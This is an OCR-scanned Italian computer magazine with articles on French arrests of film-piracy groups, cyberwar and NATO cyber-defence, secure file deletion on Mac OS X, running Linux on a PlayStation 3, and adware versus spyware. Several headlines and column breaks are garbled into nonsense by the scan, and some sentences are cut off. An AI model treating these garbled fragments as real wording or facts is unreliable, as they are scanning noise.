misfatti anche con altri pseudonimi. Ci- 
nefox, per esempio, rilascia un gran nu- 
mero di copie con pseudonimi diversi, 
come GeT, QTRF e altri. 
All'ultima rilevazione, il gruppo Cinefox 
aveva diffuso in pochi mesi oltre 200 
"edizioni" pirata francesi di tutti i tipi (vi- 
deocamera, DVD, R5, Blu-Ray). Solo 
su Mininova si trovano 246 torrent. 
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Ricordiamo che Cinefox non diffonde- 
va le sue "opere" via peer-to-peer, ben- 
sì su TOPSite, spazi chiusi, molto selet- 
tivi a cui possono accedere solo per- 
sone abilitate. "Il sequestro del mate- 
riale informatico delle persone arresta- 
te" - spiega l'Associazione per la Lot- 
ta contro la Pirateria Audiovisiva - "do- 
vrebbe consentire di identificare nuovi 
obiettivi, poiché pare che i vari gruppi 
di pirati siano spesso in contatto tra lo- 
ro. Per il momento sono state arresta- 
te solo alcune persone ma si tratta di 
obiettivi prioritari. Si spera che ne se- 
guiranno altri". 
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Un membro di uno di questi TOPSite 
ci ha spiegato che cosa può essere 
accaduto. "La storia è nata dal fatto 
che un siteop (un amministratore di 
server warez, NDR), ha soffiato de- 
gli affils (membri del Top, NDR) a un 
altro siteop (...) Siti come questi frut- 
tano quantità enormi di denaro (...) 
e quando sono dei team ad affittare 
questo accesso, questo consente lo- 
ro di pagare tutti i loro supply (colo- 
ro che diffondono materiale nei Top, 
NDR) (...) Il tizio che registra l'au- 
dio in sala va pagato, non lo fa gra- 
tis, soprattutto per organizzazioni co- 
me queste (...) d'altra parte, per loro 
questi sono spiccioli (...) Ho già vi- 
sto un siteop fare più soldi di un ope- 
raio (...) Questa gente è condanna- 
ta nell'ambiente. (...) Le informazioni 
pubblicate sono vecchie, l'80% degli 
slave sono stati cambiati. Il DNS non 
punta all'IP indicato. (...) Un errore 
che la dice lunga sulla talpa". 
Cinefox forniva anche molte immagi- 
ni. Il suo fondatore, noto anche sot- 
to lo pseudonimo di Gandja/Wereld 
(WeR - VFC/SCaN) faceva parte an- 
che di altri gruppi come GeT. 



Era in corso una forma di collabo- 
razione con altri team, con scam- 
bi di favori come nel caso dell'ex- 
team AAV (in realtà VCDFrv), pres- 
so il quale veniva recuperato l'audio 
per la realizzazione delle "edizioni" 
francofone. 



:: Il warez francofono 
nei guai? 

La seconda operazione di polizia 
ha colpito un team che si stava raf- 
forzando sempre più nell'ambien- 
te warez. CaRNage diffondeva un 
enorme numero di novità registrate 
nelle sale. L'operazione messa in at- 
to a Montpellier, che ha coinvolto uno 
dei membri di Cinefox, ha fatto sal- 
tare un altro anello della catena wa- 
rez francofona. Il membro di CaRNa- 
je era specializzato nel cosiddetto 
camcording (registrazione illega- 
le su videocamera dei film duran- 
te la loro proiezione in sala, NDR). 
In particolare, era il responsabile di 
tutte le prime versioni pirata francofo- 
ne di film quali "Asterix alle Olimpia- 
di", "Jumper", "Bienvenue Chez Les 
Chtis", "Iron Man", "Indiana Jones e il 
regno del teschio di cristallo", "Skate 
or Die" ed "E venne il giorno". 
La polizia informatica è particolar- 
mente attiva in questi ultimi tempi 
e la retata potrebbe continuare. Le 
persone fermate hanno fornito indi- 
cazioni che permetteranno di risa- 
lire ad altri pirati di professione, al- 
cuni dei quali si trovano in Canada, 
Olanda, Svizzera e Belgio. I fermati 
"hanno ammesso i fatti" e hanno de- 
cisamente di che preoccuparsi, per- 
ché le opere che diffondevano ille- 
galmente su Internet erano preva- 
lentemente novità in circolazione nel- 
le sale o non ancora uscite in Fran- 
cia. I detentori dei diritti violati po- 
trebbero quindi ovviamen- 
te cercare di presen- ^ff^ * 
tare il conto a que- * 
sti pirati, in aggiunta 
al procedimento pe- 
nale che è già in at- 
to in seguito all'aper- 
tura di un fascicolo giu- 
diziario da parte del giu- 
dice istruttore, la Signora 




Juvasinovic (Tribunale di Parigi). "Te- 
nuto conto della quantità di film pre- 
senti e del materiale sequestrato" - 
afferma una fonte vicina all'indagi- 
ne - "a questo punto delle operazioni 
non si può trarre una deduzione pre- 
cisa, ma si tratta di diverse migliaia 
di opere". L'inchiesta continuerà ora 
sulla base dei numerosi indizi otte- 
nuti durante le perquisizioni effet- 
tuate nei domicili delle persone fer- 
mate. Vari server sono stati identifi- 
cati durante l'inchiesta. Alcuni spazi 
di archiviazione raggiungevano i 60 
Terabyte di dati, pari a circa 88.000 
film in formato DivX. 
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La guerra informai 



Uopo lai tòmi, Taiwan! 
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al libro bianco della difesa pre- 
sentato da Nicolas Sarkozy lo 
scorso giugno dimostrava un 
certo interesse per i preparati- 
vi in vista di una cyber-guerra. 



iava la necessità di acquisire satelliti di 
osservazione e spionaggio, per esem- 
pio sistemi d'ascolto elettromagnetici. 
L'esercito francese intende inoltre do- 
tarsi di strumenti offensivi per la lotta 
informatica: cyber-guerrieri sotto il co- 
mando dello stato maggiore dell'eserci- 
to. I servizi di informazione non dovreb- 
bero privarsi di questa capacità di rea- 
gire a tentativi di attacchi informatici. La 
Francia arriva in ritardo? Sì e no. Oc- 
corre specificare che Paesi come la Ci- 
na e gli Stati Uniti si stanno dedicando 
alla questione da almeno un decennio. 
Già nel 1999, due colonnelli dell'eser- 
cito cinese redigevano un documento 
dedicato alle innovazioni tecnologiche 
in ambito bellico. L'obiettivo del rappor- 
to: riportare la vittoria senza combatte- 
re. È nel febbraio 1999 che i due co- 
lonnelli, per la precisione Qiao Liang 
e Wang Xiangsui, diffondono uno stu- 
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zione: come vincere una guerra sen- 
za sfoderare un solo fucile. Gli autori 
dello studio mettevano in luce un me- 
todo che un anno dopo è stato ripre- 
so anche dagli USA, dalla Gran Breta- 
gna e dalla Francia: "Cento vittorie in 
cento battaglie non sono la prospetti- 



te". Il documento era intitolato "Unre- 
stricted Warfare" ed esponeva chia- 
ramente, nero su bianco, i diversi tipi 
di guerre da tenere sotto controllo: in- 
formatiche, economiche, finanziarie... 
(http://www.terrorism.com/documen- 
ts/TRC-Analysis/u nrestricted.pdf) 
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La NATO segue la scia 



>rmati- 

ci, ha proposto la creazione e la mes- 
sa in opera di un centro per la difesa 
informatica degli interessi dei mem- 
bri della NATO. "L'obiettivo del centro 
sarà quello di promuovere la coope- 
razione tra i membri della NATO nel- 
la difesa informatica, di predisporre 
programmi di formazione e di lavora- 
re sugli aspetti legali della lotta con- 
tro il terrorismo informatico" - spie- 
gava all'epoca Lauri Allmann, sotto- 
segretario del ministero estone del- 



la difesa. Più che un unita di cyber- 
soldati, si trattava di un "centro stu- 
di". Due anni dopo, il centro ha pre- 
so vita in una base militare di Tallinn. 
L'edificio, costruito in grossi blocchi 
di pietra squadrati, ospiterà un cen- 
tro decisamente speciale. Suleyman 
Anil, responsabile della sicurezza in- 
formatica della NATO, ha spiegato in 
occasione della conferenza E-Crime 
Congress a Londra che la pirateria 
informatica è divenuta uno dei moti- 
vi di preoccupazione dell'Organizza- 
zione del Trattato del Nord Atlantico. 
Lo spionaggio on-line e il terrorismo 
elettronico rappresentano ormai vere 



minacce. La pirateria informatic 
colloca ormai ai livelli più alti insic 
agli attacchi missilistici e all'ener 
Questi attacchi sono sempre più 
merosi e non riteniamo che il prok 
ma sia destinato a scomparire rapi 
mente senza che siano adottate mi 
re a livello mondiale. La pirateria 
formatica potrebbe diventare un p 
blema globale". Un messaggio ci 
ro ai pirati e agli Stati che avesser 
mente di difenderli. È stato create 
secondo centro, oltre a quello di ' 
linn: è il Centro di Eccellenza N/ 3 
per la difesa cibernetica, all'inte 
della sede della NATO a Bruxelles 
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// modo definitivo per riaiunme osai 
traccia ili oc file so Mac? Vediamo il 
metodo Satinano so Mac OSX ' 



I 



uando si elimina un file in am- 
biente Mac OS X, questo si- 
stema operativo come gran 
parte si quelli in commercio 
si limita a "dimenticare" la sua posi- 
zione perché, prima o poi, venga sovra- 
scritto da altri dati. Fino a quel momen- 
to però seppure apparentemente non 
disponibili e ritrovabili all'utente comu- 
ne, i dati sono al loro posto e leggibili. 
Da questo assunto scaturisce la meto- 
dologia della rimozione "sicura" dei dati, 
resa celebre da alcune direttive del Di- 
partimento della Difesa degli Stati Uni- 
ti, di sovrascrivere più volte lo spazio in 
cui si trovano i file. 



:: Il metodo Gutmann 

Tutto è partito da una te- 
sina presentata nel 
1996 alla confe- 
renza Usenix 
da Peter Gut- V 
mann: "Secu- 
re Deletion of Da- 
ta from Magnetic and 
Solid-State Memory" (ht- 
tp ://www. usenix.org/pu bl ica- 
tions/library/proceedings/sec96/ 
fui Lpapers/gutmann/index. html) ha 
dato origine la paranoia diffusa che 



agenzie ed organizzazioni governati- 
ve hanno mezzi per leggere i file non 
cancellati in toto dai dischi. La rispo- 
sta è il "metodo Gutmann", un algorit- 
mo utilizzato per eliminare totalmente 
i contenuti di un file o un settore su 
un disco per computer scrivendo una 
serie di 35 schemi di bit sul disco. 



:: E SU MaC? 

A partire da Mac OS 10.3, Apple of- 
fre già il metodo Gutmann, in due for- 
me. La prima è la cancellazione tramite 
"Vuota Cestino in modalità sicura" (Secu- 
re Empty Trash in inglese) che sovrascrie 
i dati presenti nel cestino sette volte. 
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Nascondi Finder 
Nascondi altre 
Mostra tutte 



La seconda modalità presuppone l'uso 
di Utility Disk (Disk Utility). Si selezio- 
na il disco, poi si sceglie il tab "Inizia- 
lizza" e da questo, in basso, il pulsan- 
te "Opzioni sicurezza...". La finestra se- 
guente permette di impostare i vari li- 
velli e numeri di cancellazione, tra cui il 
massimo, 35. 
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La soluzione è un software chiamato Per- 
manent Eraser (http://www.edenwaith. 
com/products/permanent%20eraser/) 
che effettua sovrascrittura multipla, mo- 
difica casuale del nome, abbreviazione 
e unlinking dal filesystem. 
Un set di opzioni davvero notevoli e non 
si fatica a credere all'affermazione del- 
l'autore che "una volta cancellati, i dati 
non possono più venire letti con meto- 
di tradizionali". 

Permanent Eraser è arrivato alla ver- 
sione 2.3.3 e ha richieste tutto somma- 
to modeste: funziona da 
Mac OS 10.2 in poi (anche su Leopard), 
richiede solo 6MB di RAM e 1MB su di- 
sco. Oltre che in inglese è localizzato 
in varie lingue è totalmente gratuito ed 
open source, con codice sorgente in- 
cluso nell'immagine disco da meno di 
500KB che si scarica dal sito web. 
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:: Cancellazione controllata - Come funziona 



Ci sono però delle esigenze per cui 
quanto offre Apple non basta, ad 
esempio il cancellare solo alcuni fi- 
le, non tutto un disco o partizione, 
35 volte. Il cestino arriva purtroppo 
sono a 7. 



PemiaTiftrtt Erasar 2.1.1 :: Sacuraly ara» your fltes 



L'utilizzo è immediato quanto versa- 
tile. Appena lanciato il software Per- 
manente Eraser propone di cancel- 
lare in maniera sicura il contenuto 
del cestino (se contiene qualcosa) 
e a conferma farà le sue trentacin- 
que passate 
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Se poi si vuole eliminare uno o più 
file senza passare dal cestino basta 
selezionarli e trascinarli sull'icona del 



programma. Lo stesso vale per i di- 
schi ottici riscrivibili (CD-RW e DVD- 
RW) di cui si vuole effettuare una ri- 
pulitura davvero sicura (ma anche 
lenta, attenzione!). 

:: E IH PÌÙ... 

In perfetto stile Macintosh, Per- 
manente Eraser dispone di alcu- 
ni tocchi di classe. Uno è quello di 
non dover andare a cercare l'icona 
del programma nella cartella Appli- 
cazioni o aggiungere un ennesimo 
elemento al Dock: l'icona si può tra- 
scinare e mettere nella toolbar del 
Finder e da qui azionarlo o trascinar- 
ci sopra i file o l'unità disco da can- 
cellare. 

Un altro tocco, ri- 
servato agli uten- 
ti di Mac OS X dal 
10.4 in su, è un plu- 
gin accluso: si trat- 
ta di un workflow 
già pronto per Au- 
tomator che ag- 
giunge un ulteriore 
modo di azionare Permanent Eraser, 
con un Control-Click (o Click con ta- 
sto destro se lo avete) sul contenu- 
to scelto. ■ 
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la PS3 è invertente 
ma per MI gli 
amanti ilei Piagnine 
è impassibile avere 
nne strumento tìi 
gneste tipe senza 
il loro OS, eeee 
Geme istallarle e 
utilizzarle 
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a PlayStation 3 di Sony, 
uno dei maggiori succes- 
si commerciali della sto- 
ria dell'informatica (al 
31 marzo 2008 ne erano sta- 
ti venduti quasi 13 milioni di 
esemplari, di cui 5 milioni in 
Europa) grazie alla sua versa- 
tilità come sistema multime- 
diale e di gioco, si può usa- 
re anche come piattaforma di 
sviluppo. Sin dall'inizio del nuovo 
millennio Sony ha cercato di spinge- 
re l'uso della PS2 come piattafor- 
ma aperta da usare per lo 
sviluppo con il sistema ope- 
rativo libero Linux. Il gigan- 
te giapponese ha sostenu- 
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Quale linux 



Molte release Linux si possono 
installare sulla PS3, tra cui Fe- 

dora, Suse, Ubuntu, Gentoo e Yellow 
Dog Linux. Quest'ultima ha il suppor- 
to ufficiale di Sony ed è estremamen- 
te facile da usare ma nella comunità 
dei programmatori va per la maggio- 
re anche Fedora. Per scaricare Yel- 
low Dog Linux possiamo collegarci 
all'indirizzo 
http://www.terrasoftsolutions.com/ 
support/downloads/ 
Mentre potremo scaricare Fedora da 
http://fedoraproject.org/ 



to la pubblicazione del PS2 Linux kit, 
che includeva una sistema operativo 
Linux, una tastiera e un mouse USB, 
un adattatore VGA, un adattatore di 
rete per Ethernet e un hard disk da 
40 GB. Questa soluzione, però, non 
ebbe molto successo. Prima di tutto 
il supporto era disponibile solo per le 
PS2 della prima generazione (quelle 
più spesse) e inoltre la potenza della 
macchina con gli strumenti a disposi- 
zione dei programmatori era limitata. 
La situazione è completamente diver- 
sa con la PS3. Il supporto Linux per 
questa console è ampiamente dispo- 
nibile e installare il sistema operativo 
è facile: c'è un'opzione per farlo nel- 
l'interfaccia della console! 

:: Non tutto è a portata 
di mano 

La PlayStation 3 ha un hardware note- 
vole: processore Celi Broadband En- 
gine da 260 Milioni di transistor, 256 
MB di RAM principale più altri 256 MB 
di VRAM dedicata al chipset grafico 
RSX (creato da NVIDIA), connessio- 
ni Ethernet (10BASE-T, 100BASE-TX, 
1000BASE-T), Wi-Fi IEEE 802.11 b/ 
g e Bluetooth 2.0, hard disk SATA da 
2.5" (20GB, 40GB, 60GB od 80GB a 
seconda del modello), porte di ogni 
genere e infinite altre amenità. Non 
tutto però è portata di mano quando 
usiamo la console per programma- 
re in Linux. Il sistema operativo vie- 
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Le opzioni delle modalità video della PlayStation 3 variano in base al Paese in 
cui l'abbiamo comprata. In Italia e nelle e altre regioni PAL (principalmen- 
te in Europa), la modalità video 576i viene visualizzata come [Normale (PAL)]. 
Negli USA (e le altre regioni NTSC tra cui l'Asia) la modalità video 480i viene 
visualizzata come [Normale (NTSC)]. 

In base al collegamento cambiano le risoluzioni, come possiamo vedere in que- 
sta tabella: 





| Modalità 


PAL 


NTSC 




Ihdmi 


1080p/1080i/720p/ 
576p 


1080p/1080i/720p/ 
480p 




Component 


1080p/1080i/720p/ 
576p/576i 


1080p/1080i/720p/ 
480p/480i 


Composito/ 
S-Video 


576Ì/480Ì 


576Ì/480Ì 


SCART 


576p/576i 


480p/480i 



Se siamo abituati a lavorare su computer queste risoluzioni possono sembrare un 
po' fumose. In pratica, quando leggiamo 576p o 576i significa che il segnale video 
è composto da 576 linee video orizzontali. La p e la i indicano come sono trasmes- 
se. La p indica la scansione progressiva, usata da tutti i monitor LCD, molti moni- 
tor a tubo catodico e la maggior parte di quelli in alta definizione. In questa moda- 
lità video tutte le linee di scansione che compongono un fotogramma sono scom- 
poste una dopo l'altra a differenza di quanto succederebbe se la scansione fosse 
interlacciata (nel qual caso la sigla sarebbe 576i). L'interlacciamento divide infatti 
le linee di scansione in due parti, dette campi o semiquadri, suddivisi in linee pa- 
ri e dispari ed è nata per limitare la larghezza di banda necessaria alla trasmissio- 
ne. Per avere un termine di riferimento noto, una modalità video 576p/i ha di so- 
lito una risoluzione orizzontale di 720 o 704 pixel... 
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Rinunciare all'interfaccia a fine- 
stre di Linux ci permette di ri- 
sparmiare un bel po' di memoria ma 
liberarne dell'altra non ci farebbe 
male. Per vedere quali processi oc- 
cupano più memoria possiamo usa- 
re il comando top (semplicemente 
da una shell) e farci dire esattamente 
quanta memoria stanno usando i vari 
processi scrivendo (la lettera maiu- 
scola, che sta per "Ordina per"), poi q 
(minuscola) e premendo Invio. Vedre- 
mo una lista di processi ordinati per 
spazio occupato. Se ne identifichiamo 
qualcuno che non ci serve, torniamo 
all'interfaccia principale premendo q 
e procediamo alla sua eliminazione. 
Possiamo eliminare i processi editan- 
do direttamente il file dalla directory 
del runlevel in uso. Ogni runlevel ha la 
sua cartella, che si chiama rcX.d (do- 
ve X è il numero del runlevel) e si tro- 
va in /etc/rc.d. Per esempio, il runle- 
vel 2 avrà la directory /etc/rc.d/rc2. 
d. Altrimenti possiamo usare l'utility 
chkconfig. Naturalmente questo tipo 
di operazione è molto delicata: non 
possiamo rimuovere materiale di cui 
non siamo sicuri. In caso di dubbio, 
sospendiamo temporaneamente l'eli- 
minazione e cerchiamo consigli da 
utenti più esperti (ci sono vari new- 
sgroup di supporto per la program- 
mazione in Linux su PS3). 



ne infatti eseguito in una macchina 
virtuale, detta hypervisor, che limita 
il nostro accesso all'hardware della 
console. Abbiamo ampie possibilità 
di movimento ma non possiamo, per 
esempio, accedere direttamente al 
chipset grafico o all'hard disk SATA. 
Potremo in parte sfruttare il processo- 
re grafico attraverso un framebuffer, 
ossia una memo- 
ria buffer del- 
la scheda 
video nel- 
la quale 
vengono 
memoriz- 
zate le in- 
formazioni 
di visualiz- 
zazione sullo 
schermo. Inoltre 
un drive SCSI ci permette di salvare 
i nostri dati sulla parte del disco fis- 
so destinata agli "altri sistemi opera- 
tivi" ma alcune aree sono off-limits e 
non c'è alcun modo per raggiunger- 
le. In pratica, quindi, per programma- 
re abbiamo a disposizione una mac- 
china virtuale basata su un processo- 
re Celi Broadband Engine, poco più di 
200 MB di RAM, un disco SCSI, un 
lettore di supporti esterni, porte 
USB e Bluetooth e potenzialità 
grafiche gestite attraverso un 
framebuffer. 



:: Esigenze di base \ 

La PlayStation 3 viene vendu- 
ta con la dotazione necessaria a 
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usarla come console di gioco e stazio- 
ne multimediale ma non come compu- 
ter o strumento di programmazione. 
Prima di tutto ci serviranno quindi una 
tastiera USB e un mouse da collega- 
re al dispositivo. Dovremo inoltre pre- 
disporre uno schermo per vedere co- 
sa stiamo facendo. La soluzione mi- 
gliore consiste nel connettere la PS3 
a un monitor DVI HDCP (è impor- 
tante che sia compatibile con l'High- 
bandwidth Digital Content Protection 
o non riusciremo a usarlo), collegan- 
do l'uscita HDMI della console all'in- 
gresso DVI dello schermo. Con que- 
sta opzione potremo sfruttare tutte le 
modalità video della Playstation (ve- 
di box). In alternativa possiamo sfrut- 
tare un cavo video Com- 



ponent per collegare la 
console a un televi- 
k sore o a un compu- 
ter compatibile. Po- 
trebbe in alcuni ca- 
si darci dei proble- 
mi con le modalità 
grafiche più elevate 
(1080p) ma avremo 
comunque risultati sod- 
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disfacenti nella maggior par- 
te dei casi. Se queste due 
opzioni non sono acces- 
sibili, possiamo usare il 
collegamento S-Video o 
Component ma otterre- 
mo risultati inferiori sia 
in termine di risoluzione 
sia di nitidezza. 

:: Un po' di memoria 

Anche con le specifiche tecniche "ri- 
viste" per lo sviluppo con Linux la 
PS3 rimane una piattaforma di tut- 
to rispetto ma ci accorgeremo presto 
che la memoria a nostra disposizione 
per lavorare è limitata: se non inter- 
veniamo ci troveremo a perdere tem- 
po mentre il sistema fa swapping. In- 
fatti si troverà ad accedere spesso al- 
la memoria virtuale rallentando il no- 
stro lavoro. Per risolvere o quantome- 
no limitare questo inconveniente dob- 
biamo riuscire a ottimizzare una pre- 
ziosa risorsa che sui computer sia- 
mo abituati ad avere in abbondanza: 
la memoria. A consumarne una gran 
parte è il sistema a finestre di Linux, 
X. Se non dobbiamo lavorare sulla 
grafica, non ci è indispensabile e una 
buona vecchia interfaccia testuale fa- 
rà egregiamente il suo lavoro. Uno 
dei sistemi più semplici per attivarla 
è sfruttare i runlevel, una caratteristi- 
ca ereditata dai sistemi di tipo Unix 
di qualche anno fa che normalmente 
oggi non è molto sfruttata ma torna 
utile in questo caso. In pratica il run- 
level rappresenta lo stato di attività 



di una macchina per quanto ri- 
guarda i programmi in ese- 
cuzione e i servizi attivi. I 
runlevel sono identificati 
da un numero compreso 
tra e 6. Per esempio il 
runlevel serve ad ar- 
restare il sistema (nes- 
sun programma è in ese- 
cuzione) e il 6 è di reboot. 
Il runlevel 1 o "Single user 
mode" blocca i programmi in 
esecuzione in background ed è in ge- 
nere riservato ad attività di manuten- 
zione. Per esempio possiamo lavora- 
re su dischi e programmi con la cer- 
tezza che nessun processo li stia uti- 
lizzando. Tipicamente il classico am- 
biente Linux con interfaccia grafica 
è identificato con il runlevel 5 men- 
tre una semplice stazione di lavoro 
testuale senza X sarà un runlevel 2. 
Per cambiare runlevel basta usare il 
comando init (che si trova in /sbin) 
seguito dal numero del runlevel a cui 
vogliamo passare. In pratica, inse- 
rendo dalla root il comando /sbin/init 
2 chiuderemo tutti i servizi degli altri 
livelli e attiveremo quelli del runlevel 
2. In alternativa, possiamo modifica- 
re direttamente il runlevel aprendo il 
file inittab. Cerchiamo la riga 



id : 5 : initdefault (ammesso £: 

9 
che il nostro livello di ^ 

default sia 5) 



e sostituiamo il 5 con un 2. Non usia- 
mo mai questo metodo per fare il re- 
boot della console o spegnerla (runle- 



INSTALLARE LINUX 



Per procedere all'installazione, 
oltre alla versione di Linux che 
abbiamo scelto, avremo bisogno dei 
file otheros.self e otheros.bld (li 
troviamo entrambi all'indirizzo ht- 
tp ://www. terrasoftsolutions.com/ 
support/installation/ps3/otheros. 
bld), di un dispositivo di memoriz- 
zazione esterno compatibile e di un 
computer. Con il PC creiamo nella 
root del supporto esterno una cartel- 
la ./PS3. Al suo interno metteremo la 
sottocartella otheros, registrandovi i 
file otheros.self e otheros.bld. Pas- 
seremo quindi a lavorare sulla Play- 
Station 3 (dopo aver fatto un backup 
di tutti i nostri file salvati sulla con- 
sole, come per esempio film e can- 
zoni, perché verranno cancellati nel 
seguito della procedura). Dopo aver 
collegato tastiera, mouse e supporto 
esterno alla PS3 accendiamola e, dal- 
la cartella System Settings, usiamo 
la Format Utility per creare sull'hard 
disk una seconda partizione da desti- 
nare a Linux. Al reboot della console, 
torniamo in System Setting e lancia- 
mo il comando Instali other OS. 



vel 6 o 0): ci troveremmo in serie diffi- 
coltà a riavviare il si- 
stema senza un 
supporto ester- 
no come un 
boot loader 
o un recove- 
ry CD. Ora 
che abbiamo 
reimpostato 
il runlevel, al 
prossimo reboot 
vedremo il prompt di 
un'interfaccia testuale: abbiamo l'am- 
biente che ci serve per iniziare a pro- 
grammare con la nostra PS3! ■ 
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In adware o "software pubbli- 
citario" è qualsiasi program- 
ma che riproduca, renda vi- 
sibile o scarichi automatica- 
mente materiale pubblicitario su un 
computer dopo la sua installazio- 
ne o durante l'uso dell'applicazione. 
Un adware è un programma integrato 
o incorporato in un altro. Di solito viene 
usato dal programmatore come un me- 
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todo per recuperare i costi di sviluppo 
della programmazione e in alcuni ca- 
si consente di distribuire il programma 
agli utenti gratuitamente o a prezzo ri- 
dotto. Gli introiti prodotti dalla pubblici- 
tà possono rappresentare ciò che con- 
sente al programmatore di continuare a 
elaborare, integrare e migliorare il suo 
prodotto o incoraggiarlo a farlo. 
D'altro canto, la pubblicità nascosta è 



anche molto fastidiosa per l'utente. Al- 
cuni adware sono anche shareware, 
cioè programmi distribuiti gratuitamente 
la cui registrazione costa, e quindi il ter- 
mine può essere usato per distinguere i 
vari tipi di programmi distribuiti. Ciò che 
distingue un adware da altri shareware 
è il suo legame specifico con la pubbli- 
cità. È possibile per esempio che agli 
utenti sia offerta la possibilità di acqui- 
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stare a pagamento una copia "registra- 
ta" o "provvista di licenza" per elimina- 
re i messaggi pubblicitari. 

:: Preoccupazioni legittime 

Gli adware originano alcune preoc- 
cupazioni perché spesso assumo- 
no la forma di Spyware o "softwa- 
re spia", che rilevano, trasmetto- 
no e spesso rivendono informazio- 
ni relative all'attività dell'utente a 
sua insaputa e senza il suo consen- 
so. Spesso si fa confusione tra "ad- 
ware" e "Spyware", soprattutto perché 
i due concetti sono in parte sovrappo- 
sti. Per esempio, se un utente installa 
un "adware" su un computer e accetta 
l'attivazione di una funzione di traccia- 
mento, questo "adware" si trasforma in 
"Spyware" nel momento in cui un altro 
utente si serve di quel computer, poiché 
T'adware" rileva le sue attività senza 
il suo consenso. Spesso le applica- 
zioni Spyware trasmettono le abitudi- 
ni di navigazione su Internet dell'uten- 
te a un'azienda pubblicitaria che quin- 
di invia all'utente messaggi pubblicita- 
ri mirati scelti in base ai suoi interes- 
si. Kazaa per esempio è un popolare 
programma di condivisione di file che 
invia ai suoi utenti pubblicità mirata. 
I programmi adware non raccolgo- 
no né trasmettono in modo invisibi- 
le questi dati sulle attività dell'uten- 
te o le sue informazioni personali, a 
meno che l'utente stesso non sia al 
corrente o abbia autorizzato tale tra- 
smissione. 

Alcuni produttori di adware, tuttavia, 
ritengono che nemmeno le loro appli- 
cazioni che invece lo fanno siano da 
considerarsi Spyware, dato che le loro 
attività sono manifeste. Per esempio, 
un distributore di prodotti può dichia- 
rare che, dal momento che in un pun- 
to dei Termini di Uso del prodotto vi è 
una clausola che specifica l'inclusio- 
ne di programmi prodotti da terzi che 
potrebbero raccogliere e trasmettere 
dati sull'uso del computer, il prodotto 
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O Spesso gli adware si presentano come normalissime appicazioni da installare: verifichiamo 
sempre l'attendibilità della richiesta di installazione di un'estensione di Internet Explorer. 



in questione è da ritenersi come un 
semplice adware. 

Sono disponibili numerose applicazio- 
ni che aiutano gli utenti di computer af- 
fetti da programmi adware che blocca- 
no la presentazione di messaggi pub- 
blicitari e rimuovono i moduli Spyware: 
le vedremo nel dettaglio in questo spe- 
ciale. Per evitare un effetto boomerang, 
come sempre nel campo della pubblici- 
tà, i creatori di adware dovrebbero man- 
tenere un equilibrio tra i loro tentativi 
di generare profitti e il desiderio degli 
utenti di essere lasciati in pace. 

:: Adware volontario 

Il programma di posta elettronica 
Eudora sviluppato originariamente 
da Qualcomm è un tipico esempio di 



"modalità adware" all'interno di un 
programma. Dopo un periodo di pro- 
va in cui tutte le funzioni del program- 
ma sono disponibili, all'utente viene of- 
ferta una scelta: una modalità gratui- 
ta (ma con funzioni limitate) e una mo- 
dalità con pubblicità con tutte le fun- 
zioni. Se scegliamo di usare la moda- 
lità con pubblicità, che in questo caso 
non è particolarmente invasiva e fasti- 
diosa, Eudora diventa un adware, seb- 
bene a detta di Qualcomm il program- 
ma non rilevi alcuna informazione sulle 
attività dell'utente. 

Un altro esempio è DVD Profiler (pro- 
gramma per archiviare i DVD), che mo- 
stra le immagini dei DVD in alta risolu- 
zione solo a chi si registra e paga e, al 
contempo, può disabilitare la pubblici- 
tà all'interno del programma. ■ 
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